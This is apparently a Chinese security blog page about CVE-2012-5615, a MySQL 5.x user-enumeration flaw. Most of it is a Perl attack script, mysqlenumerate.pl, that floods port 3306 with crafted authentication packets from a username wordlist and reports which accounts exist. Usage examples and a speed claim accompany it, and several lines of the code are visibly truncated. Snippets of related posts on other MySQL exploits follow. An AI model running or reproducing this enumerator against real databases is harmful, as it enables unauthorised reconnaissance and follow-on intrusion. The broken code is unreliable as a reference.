mysql信息泄露漏洞_CVE-2012-5615 MySQL/MariaDB 信息泄露漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...

MySQL 5.x 用户账户枚举漏洞CVE-2012-5615详解
最新推荐文章于 2024-08-12 23:11:19 发布
原创 最新推荐文章于 2024-08-12 23:11:19 发布 · 606 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql信息泄露漏洞

本文介绍了MySQL 5.x服务器中一个旧认证机制导致的信息泄露漏洞,使得攻击者可以通过不同的错误消息进行用户账户枚举。文章还提供了一个名为mysqlenumerate.pl的脚本示例,用于检测存在该漏洞的系统,并展示了如何利用此漏洞检查用户名是否存在。

# MySQL User Account Enumeration Utility

# When an attacker authenticates using an incorrect password

# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server

# the mysql server will respond with a different message than Access Denied, what makes

# User Account Enumeration possible.

# The Downside is that the attacker has to reconnect for each user enumeration attempt

#20000 user accounts in 7 minutes

#Mon Jan 16 09:00:18 UTC 2012

#Mon Jan 16 09:07:26 UTC 2012

#root@vs2067037:~# wc -l MEDIUM.LST

#21109 MEDIUM.LST

#A usernames.txt wordlist is included in this package

#examples:

#root@vs2067037:~# perl mysqlenum.pl host usernames.txt

#

#[*] HIT! -- USER EXISTS: administrator@host

#

#root@vs2067037:~# perl mysqlenum.pl host usernames.txt

#

#[*] HIT! -- USER EXISTS: admin@host

#

use IO::Socket;

use Parallel::ForkManager;

$|=1;

if ($#ARGV != 1) {

print "Usage: mysqlenumerate.pl \n";

exit;

}

$target = $ARGV[0];

$wordlist = $ARGV[1];

$numforks = 50;

$pm = new Parallel::ForkManager($numforks);

open FILE,"

unlink '/tmp/cracked';

@users = ();

$k=0;

while() {

chomp;

$_ =~ s/\r//g;

$users[$k++] = $_;

}

close FILE;

$k2 = 0;

for(;;) {

for ($k=0;$k

$k2++;

if (($k2 > $#users) or (-e '/tmp/cracked')) {

exit;

}

my $pid = $pm->start and next;

$user = $users[$k2];

goto further;

again:

print "Connect Error\n";

further:

my $sock = IO::Socket::INET->new(PeerAddr => $target,

PeerPort => '3306',

Proto => 'tcp') || goto again;

recv($sock, $buff, 1024, 0);

$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".

"\x4e\x5f\x51\x55\x45\x4d\x45\x00";

$buf = chr(length($buf)-3). $buf;

print $sock $buf;

$res = recv($sock, $buff, 1024, 0);

close($sock);

if ($k2 % 100 == 0) {

print $buff."\n";

}

if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}

unless (-e '/tmp/cracked') {

open FILE, ">/tmp/cracked";

close FILE;

print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";

open FILE, ">jackpot";

print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";

exit;

}

}

$pm->wait_all_children;

}

月生南浦
关注
CVE-2012-2122 Mysql身份认证漏洞及利用
alert['Hello World']
01-25 4736
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测msf漏洞利用漏洞加固建议参考链接 漏洞描述   当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4972
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
mysql 缓冲区溢出_CVE-2012-5611MySQL/MariaDB 基于栈的缓冲区溢出漏洞
weixin_39894932的博客
01-19 730
利用条件:需要有效的MySQL用户名和密码1、MySQL零日漏洞概述为了确定最近MySQL零日漏洞的严重程度,我们首先必须深入分析每个漏洞。这些漏洞已经被分配了以下公共漏洞和暴露(Common Vulnerabilities and Exposures CVE)ID:◆ CVE-2012-5611 MySQL基于堆栈的缓冲区溢出:这是通过发送超长参数到GRANT FILE命令来触发的,该操作会导...
mysql 数据库信息泄露
weixin_34061555的博客
02-20 751
昨天,发现系统被人通过程序漏洞,获取到了数据库的信息,并获取系统的后台登录账号进行了登录。 问题产生的原因是系统一个url存在参数未过滤漏洞,导致别人通过这个url如http://daomain/a.php?xxxxxxxxx&id=23,在通过havij软件获取到了数据库信息。未过滤的参数就是id,在程序中没有做校验。 查找问题的过程,通过分析nginx的log,发现大量如下的代码,...
Mysql学习笔记
人饭子的博客
10-31 442
Mysql shodan : "product:MySQL" fofa : app="Oracle-MySQL" 描述 MySQL 是一个关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种关联数据库管理系统,MySQL 的 SQL 语言是用于访问数据库的最常用标准化语言。MySQL 软件采用了双授权政策,它分为社区版和商业版,一般中小型...
漏洞修复方法:Oracle MySQL/MariaDB漏洞(CVE-2022-0778)、SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】、Harbor 代码问题漏洞(CV
weixin_54626591的博客
03-25 3397
Oracle MySQL/MariaDB漏洞(CVE-2022-0778)、SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】、Harbor 代码问题漏洞(CV
MySQLMariaDB / PerconaDB漏洞
linjingyg的博客
02-17 2234
  【漏洞预警】MySQL / MariaDB / PerconaDB - 提权/条件竞争漏洞(附POC)(8:00更新)      漏洞发现人:Dawid Golunski   漏洞级别:严重   CVE编号 :CVE-2022-6663 / CVE-2022-5616   漏洞影响:   MariaDB< 5.5.52< 10.1.18   < 10.0.28   MySQL<=5.5.51<=5.6.32   <=5.7.14   Perco
CVE-2012-2122 mysql/mariaDB身份认证漏洞
最新发布
weixin_68177269的博客
08-12 723
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,不断的尝试登录连接,回导致MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。影响范围#所有的Mariadbmysql版本:5.1.61、5.0.11、5.3.5、5.5.22。可见经过大数量的暴力登录之后,直接不需要密码登录到mysql。使用docker-compose 创建靶场环境。下载安装vulhub靶场环境。二、msf漏洞scan探测。不知道为什么没跑出来🥴。
Mysql 身份认证绕过漏洞CVE-2012-2122)复现
weixin_57379923的博客
08-09 1144
这段代码的主要目的是尝试通过 MySQL 户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 权 声 明:本博所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
Mysql身份认证绕过漏洞CVE-2012-2122)复现
君莫hacker的博客
09-12 2737
0x01 漏洞介绍 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 漏洞编号 CVE-2012-2122 受影响版本 数据库 版本 MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 0x02
MySQL/MariaDB/Percona数据库升级脚本
01-20
MySQL/MariaDB/Percona数据库升级脚本 MySQL/MariaDB/Percona数据库升级脚本截取《OneinStack》中upgrade_db.sh,一般情况下不建议升级数据库版本,该脚本专提供给各位版本控们。为防止大版本之间兼容问题,脚本默认仅支持同一大版本之间的升级,如:MySQL-5.6.25升级到MySQL-5.6.26、MySQL-5.5.44升级到MySQL-5.5.45、MariaDB-10.0.20升级到MariaDB-10.0.21;不能跨分支版本且不能跨大版本,如从MySQL-5.5.44升级到PerconaL-5.5.44-37.3、MySQL-5.
mysql信息泄露漏洞,MySQL远程信息泄漏和缓冲区溢出漏洞
weixin_29711757的博客
03-17 1172
MySQL远程信息泄漏和缓冲区溢出漏洞2006-05-10eNet&Ciweek3 COM_TABLE_DUMP服务器入侵在sql/sql_base.cc的1090行:TABLE *open_table(THD *thd, TABLE_LIST *table_list, MEM_ROOT *mem_root,bool *refresh, uint flags){reg1 TABLE *ta...
隐藏MySQL/MariaDB真实版本信息
热门推荐
zhongxj183的博客
03-07 1万+
隐藏MySQL/MariaDB真实版本信息 项目中,甲方对服务器做安全扫描,发现存在较多 MySQL 低版本漏洞,并要求修复。但考虑到业务的影响,不方便直接对当前版本做升级,且我们业务部署在内网环境,也做了网络访问限制,因此实际安全隐患较小。这里尝试寻找其他的方法进行规避,即修改 MySQL 的版本号,隐藏其真实的版本信息。 测试过程记录如下,风险操作,仅供参考。 探测MySQL/MariaDB版本信息 查看当前版本的方法有很多,常见的有: 服务器上执行 mysql -V 登录mysql,使用sql语句查
mysql percona server_MySQL Study之--Percona Server版本号
weixin_35895431的博客
02-07 365
[root@mysql2 soft]# rpm -vih Percona-Server-client-56-5.6.25-rel73.1.el6.x86_64.rpm --forcewarning: Percona-Server-client-56-5.6.25-rel73.1.el6.x86_64.rpm: Header V4 DSA/SHA1 Signature, key ID cd2efd2...
MySQL安全临时文件建立漏洞
zgqtxwd的专栏
05-01 295
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
mysql 5.7.11提权_【漏洞预警】MySQL / MariaDB / PerconaDB - 提权/条件竞争漏洞(11.4日视频已更新)(附POC)...
weixin_28755847的博客
01-19 483
漏洞发现人:Dawid Golunski漏洞级别:严重CVE编号 :CVE-2016-6663 / CVE-2016-5616漏洞影响:MariaDB< 5.5.52< 10.1.18< 10.0.28MySQL<= 5.5.51<= 5.6.32<= 5.7.14Percona Server< 5.5.51-38.2< 5.6.32-78-1&...
绿盟科技互联网安全威胁周报2016.27 请关注MySQL远程代码执行漏洞
weixin_33982670的博客
09-01 470
绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-27,绿盟科技漏洞库本周新增80条,其中高危38条。本次周报建议大家关注持续关注MySQL远程代码执行漏洞CVE-2016-6662,这个漏洞可以拿到Root权限,官方还没有给出补丁。 焦点漏洞 MySQL远程代码执行漏洞(CVE-2016-6662) NSFOCUS ID:34777 CV...
mysql 帐户枚举漏洞_Oracle MySQL Server 5.5.19用户名枚举漏洞
weixin_34991792的博客
01-19 339
发布日期:2012-12-01更新日期:2012-12-05受影响系统:Oracle MySQL 5.5.19MariaDB MariaDB 5.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56766CVE(CAN) ID: CVE-2012-561...
MariaDB/MySQL命令注入漏洞CVE-2021-27928详细解析
资源摘要信息:"CVE-2021-27928: MariaDB/MySQL 'wsrep_provider' 命令注入漏洞详细解读" MariaDBMySQL是流行的开源关系数据库管理系统。它们广泛应用于各种规模的企业和组织中,用于存储、处理和检索数据。安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值